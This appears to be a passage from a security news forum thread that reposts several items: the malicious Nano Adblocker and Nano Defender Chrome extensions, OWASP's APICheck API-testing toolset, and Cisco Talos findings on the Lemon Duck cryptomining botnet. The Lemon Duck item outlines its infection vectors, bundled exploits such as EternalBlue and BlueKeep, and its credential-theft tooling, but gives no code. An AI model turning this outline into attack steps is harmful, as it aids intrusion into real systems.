and provided me with the following synopsis: Evidence collected to date shows that the extensions are covertly uploading user data and gaining unauthorized access to at least one website, in violation of Google terms of service and quite possibly applicable laws. Google has already removed the extensions from the Chrome Web Store and issued a warning that they aren’t safe. Anyone who had either of these extensions installed should remove them from their machines immediately. Nano Adblocker and Nano Defender are available in the extension stores hosted by both Firefox and Microsoft Edge. Xu and others say that neither of the extensions available in these other locations are affected. The caveat is that Edge can install extensions from the Chrome Web Store. Any Edge users who used this source are infected and should remove the extensions. The possibility that the extensions may have uploaded session cookies means that anyone who was infected should at a minimum fully log out of all sites. In most cases this should invalidate the session cookies and prevent anyone from using them to gain unauthorized access. Truly paranoid users will want to change passwords just to be on the safe side. The incident is the latest example of someone acquiring an established browser extension or Android app and using it to infect the large user base that already has it installed. It’s hard to provide actionable advice for preventing this kind of abuse. The Nano extensions weren’t some fly-by-night operation. Users had every reason to believe they were safe until, of course, that was no longer the case. The best advice is to routinely review the extensions that are installed. Any that are no longer of use should be removed. Via arstechnica.com
-
- 1
-
Domnul boca, am prieteni care au case de pariuri, fotbal, handbal, caini, etc, nu a specificat ca joac on-line
-
APICheck - The DevSecOps toolset for HTTP APIs APICheck is an environment for integrating existing HTTP APIs tools and create execution chains easily. Designed with integration third party tools in mind. APICheck is comprised of a set of tools that can be connected to each other to achieve different functionalities, depending on how they are connected. It allows you to create execution chains Why another REST APIs tool? APICheck aims to be a universal toolset for testing REST APIs, allowing you to mix and match the tools it provides, while enabling interoperability with third party tools. This way we hope that it will be useful to a wide spectrum of users that need to deal with REST APIs. Who is APICheck for? APICheck focuses not only in the security testing and hacking use cases, the goal of the project is to become a complete toolset for DevSecOps cycles. The tools are aimed to different user profiles: Developers System Administrators Security Engineers & Penetration Testers Pipelines & data flow In *NIX, you can chain multiple commands together in a pipeline. Consider this one: In a similar way, you can build APICheck pipelines by chaining the different tools together. To allow interoperability among commands and tools, all of them share a common JSON data format. In other words, APICheck commands output JSON documents, and accept them as input, too. This allows you to build pipelines (as we showed in the previous section). Contribution If your are a tool developer you can integrate with APICheck tools in no more than 10 minutes. Please check the Integrating new tools guide Licensing This project is distributed under Apache 2 license Download: www-project-apicheck-master.zip or git clone https://github.com/OWASP/www-project-apicheck.git Source
-
The Cybersecurity research firm Cisco Talos has recently detected an activity that are linked with the cryptocurrency botnet. The experts claimed that these attacks are targetting different businesses within sectors like the government, retail, and technology. Some variants also support RDP brute-forcing, and experts have identified that the attackers also use tools such as Mimikatz, as it helps the botnet increase the number of systems participating in its opening pool. Lemon Duck Malware Lemon Duck is a botnet that has automatic spreading capabilities. Its concluding payload is a modification of the Monero cryptocurrency mining software XMR. Lemon Duck is one of the most complicated mining botnets with various impressive methods and techniques to cover up all its operations. According to the reports, the security experts have recently seen a recovery in the number of DNS requests that are connected with its command and control and mining servers. That’s why the security experts have decided to take a close look at its functionality by prioritizing previously less documented modules like the Linux branch and C# modules that are loaded by the specific PowerShell component. What’s new? This threat has been active since the end of December 2018, and there has been an apparent increase in its activity at the end of August 2020. Infection vectors The cybersecurity team, Cisco Talos, has affirmed that they had recorded 12 independent infection vectors ranging from standard copying over SMB shares and tried to use the vulnerabilities in Redis and the YARN Hadoop resource manager and job scheduler. Not only this, but the Talos experts have also noticed a huge increase in the number of DNS requests connected with Lemon Duck C2 and mining servers, and it has been done at the end of August 2020. GPUs used by Lemon Duck for mining GTX NVIDIA GEFORCE AMD RADEON Modular Functionalities In Lemon Duck, the modules that are included are the primary loader; it checks the level of user privileges and all the elements that are relevant for mining, like the type of the accessible graphic card. If these GPUs are not identified, then the loader will get download and run the commodity XMRig CPU-based mining script. Moreover, other modules are included in the main spreading module, a Python-based module packaged using a Pyinstaller, and a killer module designed to impair known competing mining botnets. Open-source PowerShell projects code included in Lemon Duck Invoke-TheHash by Kevin Robertson Invoke-EternalBlue PowerShell EternalBlue port BlueKeep RCE exploit (CVE- 2019-0708) PowerShell port Powersploit’s reflective loader by Matt Graeber Modified Invoke-Mimikatz PowerShell module Apart from this, the threat actors behind Lemon Duck want to make sure that their operation must be profitable. That’s why the Lemon Duck has checked all the infected machines for other known crypto miners and shuts them down accordingly. Via
-
- 1